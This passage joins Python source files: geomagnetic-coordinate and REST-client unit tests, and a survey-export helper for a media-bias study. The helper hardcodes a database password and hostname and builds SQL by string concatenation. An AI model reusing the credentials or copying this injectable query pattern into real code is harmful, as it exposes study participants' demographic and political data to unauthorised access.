decimal=6)
np.testing.assert_almost_equal(self.mlon_out[2], self.mlon_out[3],
decimal=6)
def test_mlt_convert_mlon_wrapping(self):
"""Test mlon wrapping"""
self.mlt_out = aacgmv2.convert_mlt(np.array([270, -90, 1, 361]),
self.dtime, m2a=False)
np.testing.assert_almost_equal(self.mlt_out[0], self.mlt_out[1],
decimal=6)
np.testing.assert_almost_equal(self.mlt_out[2], self.mlt_out[3],
decimal=6)
def test_mlt_convert_single(self):
"""Test MLT calculation for a single value"""
for i, mlon in enumerate(self.mlon_list):
self.mlt_out = aacgmv2.convert_mlt(mlon, self.dtime, m2a=False)
np.testing.assert_almost_equal(self.mlt_out, self.mlt_comp[i],
decimal=4)
def test_mlt_convert_list(self):
"""Test MLT calculation for a list"""
self.mlt_out = aacgmv2.convert_mlt(self.mlon_list, self.dtime,
m2a=False)
np.testing.assert_allclose(self.mlt_out, self.mlt_comp, rtol=1.0e-4)
def test_mlt_convert_arr(self):
"""Test MLT calculation for an array"""
self.mlt_out = aacgmv2.convert_mlt(np.array(self.mlon_list),
self.dtime, m2a=False)
np.testing.assert_allclose(self.mlt_out, self.mlt_comp, rtol=1.0e-4)
def test_mlt_convert_change(self):
"""Test that MLT changes with UT"""
self.mlt_out = aacgmv2.convert_mlt(self.mlon_list, self.dtime)
self.mlt_diff = self.mlt_out - aacgmv2.convert_mlt(self.mlon_list,
self.dtime2)
np.testing.assert_allclose(self.mlt_diff, self.diff_comp, rtol=1.0e-4)
class TestCoeffPath:
def setup(self):
"""Runs before every method to create a clean testing setup"""
import os
os.environ['IGRF_COEFFS'] = "default_igrf"
os.environ['AACGM_v2_DAT_PREFIX'] = "default_coeff"
self.default_igrf = os.environ['IGRF_COEFFS']
self.default_coeff = os.environ['AACGM_v2_DAT_PREFIX']
def teardown(self):
"""Runs after every method to clean up previous testing"""
del self.default_igrf, self.default_coeff
def test_set_coeff_path_default(self):
"""Test the coefficient path setting using default values"""
import os
aacgmv2.wrapper.set_coeff_path()
if os.environ['IGRF_COEFFS'] != self.default_igrf:
raise AssertionError()
if os.environ['AACGM_v2_DAT_PREFIX'] != self.default_coeff:
raise AssertionError()
    def test_set_coeff_path_string(self):
"""Test the coefficient path setting using two user specified values"""
import os
aacgmv2.wrapper.set_coeff_path("hi", "bye")
if os.environ['IGRF_COEFFS'] != "hi":
raise AssertionError()
if os.environ['AACGM_v2_DAT_PREFIX'] != "bye":
raise AssertionError()
    def test_set_coeff_path_true(self):
"""Test the coefficient path setting using the module values"""
import os
aacgmv2.wrapper.set_coeff_path(True, True)
if os.environ['IGRF_COEFFS'] != aacgmv2.IGRF_COEFFS:
raise AssertionError()
if os.environ['AACGM_v2_DAT_PREFIX'] != aacgmv2.AACGM_v2_DAT_PREFIX:
raise AssertionError()
def test_set_only_aacgm_coeff_path(self):
"""Test the coefficient path setting using a mix of input"""
import os
aacgmv2.wrapper.set_coeff_path(coeff_prefix="hi")
if os.environ['IGRF_COEFFS'] != self.default_igrf:
raise AssertionError()
if os.environ['AACGM_v2_DAT_PREFIX'] != "hi":
raise AssertionError()
def test_set_only_igrf_coeff_path(self):
"""Test the coefficient path setting using a mix of input"""
import os
aacgmv2.wrapper.set_coeff_path(igrf_file="hi")
if os.environ['IGRF_COEFFS'] != "hi":
raise AssertionError()
if os.environ['AACGM_v2_DAT_PREFIX'] != self.default_coeff:
raise AssertionError()
    def test_set_both_mixed(self):
"""Test the coefficient path setting using a mix of input"""
import os
aacgmv2.wrapper.set_coeff_path(igrf_file=True, coeff_prefix="hi")
if os.environ['IGRF_COEFFS'] != aacgmv2.IGRF_COEFFS:
raise AssertionError()
if os.environ['AACGM_v2_DAT_PREFIX'] != "hi":
raise AssertionError()
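# TestCoeffPath's setup mutates os.environ directly, so an exception mid-test
# can leak values into later tests. One way to scope the variables
# automatically -- a standard-library sketch, not the project's actual fixture
# (the decorator name and default values here are illustrative) -- is
# unittest.mock.patch.dict:

```python
import os
from unittest import mock


def with_default_coeff_env(func):
    """Run *func* with the coefficient variables pinned to known defaults;
    mock.patch.dict restores the previous environment on exit, even on error."""
    def wrapper(*args, **kwargs):
        defaults = {'IGRF_COEFFS': 'default_igrf',
                    'AACGM_v2_DAT_PREFIX': 'default_coeff'}
        with mock.patch.dict(os.environ, defaults):
            return func(*args, **kwargs)
    return wrapper


@with_default_coeff_env
def read_coeff_env():
    # Inside the decorated call the defaults are visible; once it returns,
    # the previous values (or their absence) are restored.
    return os.environ['IGRF_COEFFS'], os.environ['AACGM_v2_DAT_PREFIX']
```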
# lib/python/treadmill/tests/restclient_test.py (treadmill, Apache-2.0)
"""Unit test for treadmill.restclient.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import mock
import simplejson.scanner as sjs
import requests
from six.moves import http_client
from treadmill import restclient
class RESTClientTest(unittest.TestCase):
"""Mock test for RESTClient"""
def setUp(self):
"""Setup common test variables"""
pass
@mock.patch('requests.get',
return_value=mock.MagicMock(requests.Response))
def test_get_ok(self, resp_mock):
"""Test treadmill.restclient.get OK (200)"""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
resp = restclient.get('http://foo.com', '/')
self.assertIsNotNone(resp)
self.assertEqual(resp.text, 'foo')
@mock.patch('requests.get',
return_value=mock.MagicMock(requests.Response))
def test_get_404(self, resp_mock):
"""Test treadmill.restclient.get NOT_FOUND (404)"""
resp_mock.return_value.status_code = http_client.NOT_FOUND
with self.assertRaises(restclient.NotFoundError):
restclient.get('http://foo.com', '/')
@mock.patch('requests.get',
return_value=mock.MagicMock(requests.Response))
def test_get_409(self, resp_mock):
"""Test treadmill.restclient.get CONFLICT (409)"""
resp_mock.return_value.status_code = http_client.CONFLICT
with self.assertRaises(restclient.AlreadyExistsError):
restclient.get('http://foo.com', '/')
@mock.patch('requests.get',
return_value=mock.MagicMock(requests.Response))
def test_get_424(self, resp_mock):
"""Test treadmill.restclient.get FAILED_DEPENDENCY (424)"""
resp_mock.return_value.status_code = http_client.FAILED_DEPENDENCY
resp_mock.return_value.json.return_value = {}
with self.assertRaises(restclient.ValidationError):
restclient.get('http://foo.com', '/')
@mock.patch('requests.get',
return_value=mock.MagicMock(requests.Response))
def test_get_401(self, resp_mock):
"""Test treadmill.restclient.get UNAUTHORIZED (401)"""
        # XXX: The correct code is FORBIDDEN. Support the invalid
        # UNAUTHORIZED status during the migration.
resp_mock.return_value.status_code = http_client.UNAUTHORIZED
resp_mock.return_value.json.return_value = {}
with self.assertRaises(restclient.NotAuthorizedError):
restclient.get('http://foo.com', '/')
@mock.patch('requests.get',
return_value=mock.MagicMock(requests.Response))
def test_get_403(self, resp_mock):
"""Test treadmill.restclient.get FORBIDDEN (403)"""
resp_mock.return_value.status_code = http_client.FORBIDDEN
resp_mock.return_value.json.return_value = {}
with self.assertRaises(restclient.NotAuthorizedError):
restclient.get('http://foo.com', '/')
@mock.patch('requests.get',
return_value=mock.MagicMock(requests.Response))
def test_get_bad_json(self, resp_mock):
"""Test treadmill.restclient.get bad JSON"""
resp_mock.return_value.status_code = http_client.INTERNAL_SERVER_ERROR
resp_mock.return_value.text = '{"bad json"'
resp_mock.return_value.json.side_effect = sjs.JSONDecodeError(
'Foo', '{"bad json"', 1
)
self.assertRaises(
restclient.MaxRequestRetriesError,
restclient.get, 'http://foo.com', '/', retries=1)
@mock.patch('time.sleep', mock.Mock())
@mock.patch('treadmill.restclient._handle_error', mock.Mock())
@mock.patch('requests.get', mock.Mock())
def test_retry(self):
"""Tests retry logic."""
with self.assertRaises(restclient.MaxRequestRetriesError) as cm:
restclient.get(
['http://foo.com', 'http://bar.com'],
'/baz',
retries=3
)
err = cm.exception
self.assertEqual(len(err.attempts), 6)
        # Requests are made in order, but because other methods are also
        # being called, any_order is set to True to keep the test simple.
requests.get.assert_has_calls([
mock.call('http://foo.com/baz', json=None, proxies=None,
headers=None, auth=mock.ANY, timeout=(.5, 10),
stream=None, verify=True),
mock.call('http://bar.com/baz', json=None, proxies=None,
headers=None, auth=mock.ANY, timeout=(.5, 10),
stream=None, verify=True),
mock.call('http://foo.com/baz', json=None, proxies=None,
headers=None, auth=mock.ANY, timeout=(1.5, 10),
stream=None, verify=True),
mock.call('http://bar.com/baz', json=None, proxies=None,
headers=None, auth=mock.ANY, timeout=(1.5, 10),
stream=None, verify=True),
mock.call('http://foo.com/baz', json=None, proxies=None,
headers=None, auth=mock.ANY, timeout=(2.5, 10),
stream=None, verify=True),
mock.call('http://bar.com/baz', json=None, proxies=None,
headers=None, auth=mock.ANY, timeout=(2.5, 10),
stream=None, verify=True),
], any_order=True)
self.assertEqual(requests.get.call_count, 6)
@mock.patch('time.sleep', mock.Mock())
@mock.patch('requests.get',
side_effect=requests.exceptions.ConnectionError)
def test_retry_on_connection_error(self, _):
"""Test retry on connection error"""
with self.assertRaises(restclient.MaxRequestRetriesError) as cm:
restclient.get('http://foo.com', '/')
err = cm.exception
self.assertEqual(len(err.attempts), 5)
@mock.patch('time.sleep', mock.Mock())
@mock.patch('requests.get', side_effect=requests.exceptions.Timeout)
def test_retry_on_request_timeout(self, _):
"""Test retry on request timeout"""
with self.assertRaises(restclient.MaxRequestRetriesError) as cm:
restclient.get('http://foo.com', '/')
err = cm.exception
self.assertEqual(len(err.attempts), 5)
@mock.patch('time.sleep', mock.Mock())
@mock.patch('requests.get', return_value=mock.MagicMock(requests.Response))
def test_retry_on_503(self, resp_mock):
"""Test retry for status code that should be retried (e.g. 503)"""
resp_mock.return_value.status_code = http_client.SERVICE_UNAVAILABLE
with self.assertRaises(restclient.MaxRequestRetriesError):
restclient.get('http://foo.com', '/')
@mock.patch('requests.get', return_value=mock.MagicMock(requests.Response))
def test_default_timeout_get(self, resp_mock):
"""Tests that default timeout for get request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.get('http://foo.com', '/')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY, verify=True,
headers=None, json=None, timeout=(0.5, 10), proxies=None
)
@mock.patch('requests.delete',
return_value=mock.MagicMock(requests.Response))
def test_default_timeout_delete(self, resp_mock):
"""Tests that default timeout for delete request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.delete('http://foo.com', '/')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY, verify=True,
headers=None, json=None, timeout=(0.5, None), proxies=None
)
@mock.patch('requests.post',
return_value=mock.MagicMock(requests.Response))
def test_default_timeout_post(self, resp_mock):
"""Tests that default timeout for post request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.post('http://foo.com', '/', '')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY, verify=True,
headers=None, json='', timeout=(0.5, None), proxies=None
)
@mock.patch('requests.put', return_value=mock.MagicMock(requests.Response))
def test_default_timeout_put(self, resp_mock):
"""Tests that default timeout for put request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.put('http://foo.com', '/', '')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY, verify=True,
headers=None, json='', timeout=(0.5, None), proxies=None
)
@mock.patch('requests.get', return_value=mock.MagicMock(requests.Response))
def test_verify_get(self, resp_mock):
"""Tests that 'verify' for get request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.get('http://foo.com', '/', verify='/path/to/ca/certs')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY,
headers=None, json=None, timeout=(0.5, 10), proxies=None,
verify='/path/to/ca/certs'
)
@mock.patch('requests.delete',
return_value=mock.MagicMock(requests.Response))
def test_verify_delete(self, resp_mock):
"""Tests that 'verify' for delete request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.delete('http://foo.com', '/', verify='/path/to/ca/certs')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY,
headers=None, json=None, timeout=(0.5, None), proxies=None,
verify='/path/to/ca/certs'
)
@mock.patch('requests.post',
return_value=mock.MagicMock(requests.Response))
def test_verify_post(self, resp_mock):
"""Tests that 'verify' for post request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.post('http://foo.com', '/', '', verify='/path/to/ca/certs')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY,
headers=None, json='', timeout=(0.5, None), proxies=None,
verify='/path/to/ca/certs'
)
@mock.patch('requests.put', return_value=mock.MagicMock(requests.Response))
def test_verify_put(self, resp_mock):
"""Tests that 'verify' for put request is set correctly."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.put('http://foo.com', '/', '', verify='/path/to/ca/certs')
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY,
headers=None, json='', timeout=(0.5, None), proxies=None,
verify='/path/to/ca/certs'
)
@mock.patch('requests.delete',
return_value=mock.MagicMock(requests.Response))
def test_raw_payload_delete(self, resp_mock):
"""Tests that delete can handle not json serializable payload."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.delete('http://foo.com', '/', 'payload',
payload_to_json=False)
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY,
headers=None, timeout=(0.5, None), proxies=None,
data='payload', verify=True
)
@mock.patch('requests.post',
return_value=mock.MagicMock(requests.Response))
def test_raw_payload_post(self, resp_mock):
"""Tests that post can send payload not in json."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.post('http://foo.com', '/', 'payload',
payload_to_json=False)
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY,
headers=None, timeout=(0.5, None), proxies=None,
data='payload', verify=True
)
@mock.patch('requests.put', return_value=mock.MagicMock(requests.Response))
def test_raw_payload_put(self, resp_mock):
"""Tests that put can send payload not in json."""
resp_mock.return_value.status_code = http_client.OK
resp_mock.return_value.text = 'foo'
restclient.put('http://foo.com', '/', 'payload',
payload_to_json=False)
resp_mock.assert_called_with(
'http://foo.com/', stream=None, auth=mock.ANY,
headers=None, timeout=(0.5, None), proxies=None,
data='payload', verify=True
)
if __name__ == '__main__':
unittest.main()
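# The expected calls in test_retry encode the client's backoff: each retry
# round tries both hosts, and the connect timeout grows by one second per
# round while the read timeout stays at 10 s. A minimal sketch of that
# schedule -- the base and step are inferred from the asserted calls, not
# taken from restclient's source:

```python
def inferred_timeouts(retries=3, base_connect=0.5, step=1.0, read=10):
    """(connect, read) timeout pairs, one per retry round (inferred values)."""
    return [(base_connect + i * step, read) for i in range(retries)]


def inferred_attempts(hosts, retries=3):
    """Total request count: every round hits every host once."""
    return len(hosts) * retries
```

# With two hosts and three retries this yields the six calls asserted above,
# at timeouts (0.5, 10), (1.5, 10) and (2.5, 10).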
# db_helper.py (Media-Bias-Group/Teaching-Platform, MIT)
import csv
import sys
import pandas as pd
from surveyapi.models import db, Survey, Question, AnnotationSentences, SimpleChoice, RangeSliderChoice, TestSurveyGroups, SurveyRecord, Annotations
from surveyapi.create_app import create_app
from prettytable import PrettyTable
from sqlalchemy import text
from sqlalchemy import create_engine
from pprint import pprint
from collections import OrderedDict
SQLALCHEMY_DATABASE_URI = "mysql+mysqlconnector://{username}:{password}@{hostname}/{databasename}".format(
username="mediabias",
password="Tools4bias*Detection",
hostname="mediabias.mysql.pythonanywhere-services.com",
databasename="mediabias$survey"
)
MAX_QUOTA = 10
def create_db_client():
app = create_app()
ctx = app.app_context()
db.init_app(app)
return db, ctx
def get_empty_annotations(db, ctx, after_date='2000-10-10 00:00:00'):
t = PrettyTable(['identifier_key', 'survey_record_id', 'sentence_group_id', 'worker_started_at', 'count'])
ctx.push()
count = 0
sql_str = """
    SELECT identifier_key, survey_record_id, sentence_group_id, survey_record.created_at, COUNT(*) as count
FROM survey_annotations
INNER JOIN survey_record ON survey_record.id = survey_annotations.survey_record_id
WHERE survey_record.created_at > '""" + after_date + """'
AND (SELECT COUNT(*) FROM survey_annotations WHERE survey_annotations.words = '' AND survey_annotations.label = 49 AND survey_annotations.survey_record_id = survey_record.id) >= 20
GROUP BY survey_record_id
ORDER BY survey_record.created_at;
"""
sql = text(sql_str)
result = db.session.execute(sql)
for row in result:
t.add_row([dict(row)['identifier_key'], dict(row)['survey_record_id'], dict(row)['sentence_group_id'], dict(row)['created_at'], dict(row)['count'] ])
count += 1
print(t)
print("\n{} results. ".format(count))
ctx.pop()
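# The helpers in this module splice after_date into the SQL string. Since the
# statements already go through sqlalchemy.text(), the same queries can use
# bound parameters instead, letting the driver escape the value. A sketch --
# the :after_date placeholder and the function name are illustrative, not
# existing code in this module:

```python
EMPTY_ANNOTATIONS_SQL = """
SELECT identifier_key, survey_record_id, survey_record.created_at,
       COUNT(*) AS count
FROM survey_annotations
INNER JOIN survey_record
    ON survey_record.id = survey_annotations.survey_record_id
WHERE survey_record.created_at > :after_date
GROUP BY survey_record_id
ORDER BY survey_record.created_at
"""


def empty_annotations_query(after_date='2000-10-10 00:00:00'):
    """Return (sql, params) ready for db.session.execute(text(sql), params)."""
    return EMPTY_ANNOTATIONS_SQL, {'after_date': after_date}
```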
def get_survey_worker_status(db, ctx, after_date='2000-10-10 00:00:00'):
t = PrettyTable(['identifier_key', 'survey_record_id', 'sentence_group_id', 'worker_started_at', 'count'])
ctx.push()
count = 0
sql_str = """
SELECT identifier_key, survey_record_id, sentence_group_id, survey_record.created_at, COUNT(*) as count
FROM survey_annotations
INNER JOIN survey_record ON survey_record.id = survey_annotations.survey_record_id
WHERE survey_record.created_at > '""" + after_date + """'
GROUP BY survey_record_id
ORDER BY survey_record.created_at;
"""
sql = text(sql_str)
result = db.session.execute(sql)
for row in result:
t.add_row([dict(row)['identifier_key'], dict(row)['survey_record_id'], dict(row)['sentence_group_id'], dict(row)['created_at'], dict(row)['count'] ])
count += 1
print(t)
print("\n{} results. ".format(count))
ctx.pop()
def get_annotation_status(db, ctx, after_date='2000-10-10 00:00:00'):
t = PrettyTable(['survey_record_id', 'created_at', 'label', 'words', 'factual', 'sentence_group_id'])
ctx.push()
count = 0
sql_str = """
SELECT survey_record_id, created_at, label, words, factual, sentence_group_id
FROM survey_annotations
WHERE created_at > '""" + after_date + """'
ORDER BY created_at;
"""
sql = text(sql_str)
result = db.session.execute(sql)
for row in result:
t.add_row([dict(row)['survey_record_id'], dict(row)['created_at'], dict(row)['label'], dict(row)['words'], dict(row)['factual'], dict(row)['sentence_group_id'] ])
count += 1
print(t)
print("\n{} results. ".format(count))
ctx.pop()
def to_csv_briefing(db, ctx, after_date='2000-10-10 00:00:00'):
ctx.push()
    with open('to_csv_briefing_{}.csv'.format(after_date), mode='w', newline='') as csv_file:
fieldnames = ['id', 'prolific_id', 'created_at', 'age', 'gender', 'education', 'native_english_speaker', 'political_ideology', 'followed_news_outlets', 'news_check_frequency']
t = PrettyTable(fieldnames)
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writeheader()
# First, get all worker status
sql_str = """
SELECT identifier_key, survey_record_id, survey_record.created_at, COUNT(*) as count
FROM survey_annotations
INNER JOIN survey_record ON survey_record.id = survey_annotations.survey_record_id
WHERE survey_record.created_at > '""" + after_date + """'
GROUP BY survey_record_id
ORDER BY survey_record.created_at;
"""
sql = text(sql_str)
for row in db.session.execute(sql):
survey_record_id = dict(row)['survey_record_id']
# Then, get the detailed records for each id
sql_str_2 = """
SELECT identifier_key, demographics.created_at, age, gender, education, political_ideology, native_english_speaker, followed_news_outlets, news_check_frequency, demographics.survey_record_id
FROM demographics
INNER JOIN ideologies on demographics.survey_record_id = ideologies.survey_record_id
INNER JOIN survey_record on survey_record.id=ideologies.survey_record_id
WHERE survey_record.id = '""" + survey_record_id + """'
;
"""
sql_2 = text(sql_str_2)
result_2 = db.session.execute(sql_2)
for row_2 in result_2:
record = dict(row_2)
prolific_id = record['identifier_key']
created_at = record['created_at']
age = record['age']
gender = SimpleChoice.query.get(record['gender']).to_dict()['text']
education = SimpleChoice.query.get(record['education']).to_dict()['text']
native_english_speaker = SimpleChoice.query.get(record['native_english_speaker']).to_dict()['text']
political_ideology = record['political_ideology']
followed_news_outlets = record['followed_news_outlets'].split(',')
converted_news_outlets = []
for outlet in followed_news_outlets:
if (outlet.isdigit()):
ot = SimpleChoice.query.get(outlet).to_dict()['text']
converted_news_outlets.append(ot)
else:
converted_news_outlets.append(outlet)
news_check_frequency = SimpleChoice.query.get(record['news_check_frequency']).to_dict()['text']
t.add_row([survey_record_id, prolific_id, created_at, age, gender, education, native_english_speaker, political_ideology, converted_news_outlets, news_check_frequency])
writer.writerow({
'id': survey_record_id,
'prolific_id': prolific_id,
'created_at' : created_at,
'age': age,
'gender': gender,
'education': education,
'native_english_speaker': native_english_speaker,
'political_ideology': political_ideology,
'followed_news_outlets': converted_news_outlets,
'news_check_frequency': news_check_frequency
})
print('csv generated...')
# print(t)
ctx.pop()
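# Each exporter above repeats SimpleChoice.query.get(id).to_dict()['text']
# once per column. A small lookup helper keeps the row-building readable;
# the helper name is illustrative and the None-guard for unknown ids is an
# assumption, not behavior taken from the existing exporters:

```python
def choice_text(choice_id, lookup):
    """Resolve a stored choice id to its display text.

    *lookup* is any callable returning an object with a to_dict() method
    (e.g. SimpleChoice.query.get); unknown ids resolve to ''.
    """
    choice = lookup(choice_id)
    return choice.to_dict()['text'] if choice is not None else ''
```

# e.g. gender = choice_text(record['gender'], SimpleChoice.query.get)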
def to_csv_tool(db, ctx, after_date='2000-10-10 00:00:00'):
ctx.push()
    with open('to_csv_tool_{}.csv'.format(after_date), mode='w', newline='') as csv_file:
fieldnames = ['id', 'prolific_id', 'created_at', 'group_id', 'quiz_first', 'quiz_second', 'biased_article', 'bias_facts', 'bias_detection', 'tool_article_ideology']
t = PrettyTable(fieldnames)
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writeheader()
# First, get all worker status
sql_str = """
SELECT identifier_key, survey_record_id, survey_record.created_at, COUNT(*) as count
FROM survey_annotations
INNER JOIN survey_record ON survey_record.id = survey_annotations.survey_record_id
WHERE survey_record.created_at > '""" + after_date + """'
GROUP BY survey_record_id
ORDER BY survey_record.created_at;
"""
sql = text(sql_str)
for row in db.session.execute(sql):
survey_record_id = dict(row)['survey_record_id']
# Then, get the detailed records for each id
sql_str_2 = """
SELECT identifier_key, created_at, group_id, quiz_first, quiz_second, biased_article, bias_facts, bias_detection, tool_article_ideology, survey_record_id
FROM tool
INNER JOIN survey_record on survey_record.id=tool.survey_record_id
WHERE survey_record.id = '""" + survey_record_id + """'
;
"""
sql_2 = text(sql_str_2)
result_2 = db.session.execute(sql_2)
for row_2 in result_2:
record = dict(row_2)
prolific_id = record['identifier_key']
created_at = record['created_at']
group_id = record['group_id']
quiz_first = SimpleChoice.query.get(record['quiz_first']).to_dict()['text']
quiz_second = SimpleChoice.query.get(record['quiz_second']).to_dict()['text']
biased_article = SimpleChoice.query.get(record['biased_article']).to_dict()['text']
bias_facts = SimpleChoice.query.get(record['bias_facts']).to_dict()['text']
bias_detection = SimpleChoice.query.get(record['bias_detection']).to_dict()['text']
tool_article_ideology = record['tool_article_ideology']
t.add_row([survey_record_id, prolific_id, created_at, group_id, quiz_first, quiz_second, biased_article, bias_facts, bias_detection, tool_article_ideology])
writer.writerow({
'id': survey_record_id,
'prolific_id': prolific_id,
'created_at' : created_at,
'group_id': group_id,
'biased_article': biased_article,
'bias_facts': bias_facts,
'bias_detection': bias_detection,
'tool_article_ideology': tool_article_ideology,
'quiz_first': quiz_first,
'quiz_second': quiz_second,
})
print('csv generated...')
# print(t)
ctx.pop()
def to_csv_debriefing(db, ctx, after_date='2000-10-10 00:00:00'):
ctx.push()
    with open('to_csv_debriefing_{}.csv'.format(after_date), mode='w', newline='') as csv_file:
fieldnames = ['id', 'prolific_id', 'scientific_research', 'chart', 'video', 'annotation', 'extended_annotation']
t = PrettyTable(fieldnames)
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writeheader()
# First, get all worker status
sql_str = """
SELECT identifier_key, survey_record_id, survey_record.created_at, COUNT(*) as count
FROM survey_annotations
INNER JOIN survey_record ON survey_record.id = survey_annotations.survey_record_id
WHERE survey_record.created_at > '""" + after_date + """'
GROUP BY survey_record_id
ORDER BY survey_record.created_at;
"""
sql = text(sql_str)
for row in db.session.execute(sql):
survey_record_id = dict(row)['survey_record_id']
# Then, get the detailed records for each id
sql_str_2 = """
SELECT identifier_key, scientific_research, chart, video, annotation, extended_annotation, scientific_research.survey_record_id
FROM scientific_research
INNER JOIN debriefing on scientific_research.survey_record_id = debriefing.survey_record_id
INNER JOIN survey_record on survey_record.id=debriefing.survey_record_id
WHERE survey_record.id = '""" + survey_record_id + """'
;
"""
sql_2 = text(sql_str_2)
result_2 = db.session.execute(sql_2)
for row_2 in result_2:
record = dict(row_2)
prolific_id = record['identifier_key']
scientific_research = SimpleChoice.query.get(record['scientific_research']).to_dict()['text']
chart = SimpleChoice.query.get(record['chart']).to_dict()['text']
video = SimpleChoice.query.get(record['video']).to_dict()['text']
annotation = SimpleChoice.query.get(record['annotation']).to_dict()['text']
extended_annotation = SimpleChoice.query.get(record['extended_annotation']).to_dict()['text']
t.add_row([survey_record_id, prolific_id, scientific_research, chart, video, annotation, extended_annotation])
writer.writerow({
'id': survey_record_id,
'prolific_id': prolific_id,
'scientific_research': scientific_research,
'chart': chart,
'video': video,
'annotation': annotation,
'extended_annotation': extended_annotation
})
print('csv generated...')
# print(t)
ctx.pop()
def to_csv_survey_worker_records(db, ctx, after_date='2000-10-10 00:00:00'):
ctx.push()
    with open('detailed_user_record_mturk_{}.csv'.format(after_date), mode='w', newline='') as csv_file:
fieldnames = ['id', 'prolific_id', 'created_at', 'age', 'gender', 'education', 'native_english_speaker', 'political_ideology', 'followed_news_outlets', 'news_check_frequency', 'group_id', 'quiz_first', 'quiz_second', 'biased_article', 'bias_facts', 'bias_detection', 'tool_article_ideology', 'scientific_research', 'chart', 'video', 'annotation', 'extended_annotation']
t = PrettyTable(fieldnames)
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writeheader()
# First, get all worker status
sql_str = """
SELECT identifier_key, survey_record_id, survey_record.created_at, COUNT(*) as count
FROM survey_annotations
INNER JOIN survey_record ON survey_record.id = survey_annotations.survey_record_id
WHERE survey_record.created_at > '""" + after_date + """'
GROUP BY survey_record_id
ORDER BY survey_record.created_at;
"""
sql = text(sql_str)
for row in db.session.execute(sql):
survey_record_id = dict(row)['survey_record_id']
# Then, get the detailed records for each id
sql_str_2 = """
SELECT identifier_key, demographics.created_at, age, gender, education, political_ideology, native_english_speaker, followed_news_outlets, news_check_frequency, group_id, quiz_first, quiz_second, biased_article, bias_facts, bias_detection, tool_article_ideology, scientific_research, chart, video, annotation, extended_annotation, demographics.survey_record_id
FROM demographics
INNER JOIN ideologies on demographics.survey_record_id = ideologies.survey_record_id
INNER JOIN survey_record on survey_record.id=ideologies.survey_record_id
INNER JOIN tool on demographics.survey_record_id = tool.survey_record_id
INNER JOIN scientific_research on demographics.survey_record_id = scientific_research.survey_record_id
INNER JOIN debriefing on demographics.survey_record_id = debriefing.survey_record_id
WHERE survey_record.id = '""" + survey_record_id + """'
;
"""
sql_2 = text(sql_str_2)
result_2 = db.session.execute(sql_2)
for row_2 in result_2:
record = dict(row_2)
prolific_id = record['identifier_key']
created_at = record['created_at']
age = record['age']
gender = SimpleChoice.query.get(record['gender']).to_dict()['text']
education = SimpleChoice.query.get(record['education']).to_dict()['text']
native_english_speaker = SimpleChoice.query.get(record['native_english_speaker']).to_dict()['text']
group_id = record['group_id']
quiz_first = SimpleChoice.query.get(record['quiz_first']).to_dict()['text']
quiz_second = SimpleChoice.query.get(record['quiz_second']).to_dict()['text']
biased_article = SimpleChoice.query.get(record['biased_article']).to_dict()['text']
bias_facts = SimpleChoice.query.get(record['bias_facts']).to_dict()['text']
bias_detection = SimpleChoice.query.get(record['bias_detection']).to_dict()['text']
tool_article_ideology = record['tool_article_ideology']
scientific_research = SimpleChoice.query.get(record['scientific_research']).to_dict()['text']
chart = SimpleChoice.query.get(record['chart']).to_dict()['text']
video = SimpleChoice.query.get(record['video']).to_dict()['text']
annotation = SimpleChoice.query.get(record['annotation']).to_dict()['text']
extended_annotation = SimpleChoice.query.get(record['extended_annotation']).to_dict()['text']
political_ideology = record['political_ideology']
followed_news_outlets = record['followed_news_outlets'].split(',')
converted_news_outlets = []
for outlet in followed_news_outlets:
if (outlet.isdigit()):
ot = SimpleChoice.query.get(outlet).to_dict()['text']
converted_news_outlets.append(ot)
else:
converted_news_outlets.append(outlet)
news_check_frequency = SimpleChoice.query.get(record['news_check_frequency']).to_dict()['text']
t.add_row([survey_record_id, prolific_id, created_at, age, gender, education, native_english_speaker, political_ideology, converted_news_outlets, news_check_frequency, group_id, quiz_first, quiz_second, biased_article, bias_facts, bias_detection, tool_article_ideology, scientific_research, chart, video, annotation, extended_annotation])
writer.writerow({
'id': survey_record_id,
'prolific_id': prolific_id,
'created_at' : created_at,
'age': age,
'gender': gender,
'education': education,
'native_english_speaker': native_english_speaker,
'political_ideology': political_ideology,
'followed_news_outlets': converted_news_outlets,
'news_check_frequency': news_check_frequency,
'group_id': group_id,
'biased_article': biased_article,
'bias_facts': bias_facts,
'bias_detection': bias_detection,
'tool_article_ideology': tool_article_ideology,
'quiz_first': quiz_first,
'quiz_second': quiz_second,
'scientific_research': scientific_research,
'chart': chart,
'video': video,
'annotation': annotation,
'extended_annotation': extended_annotation
})
print('csv generated...')
# print(t)
ctx.pop()
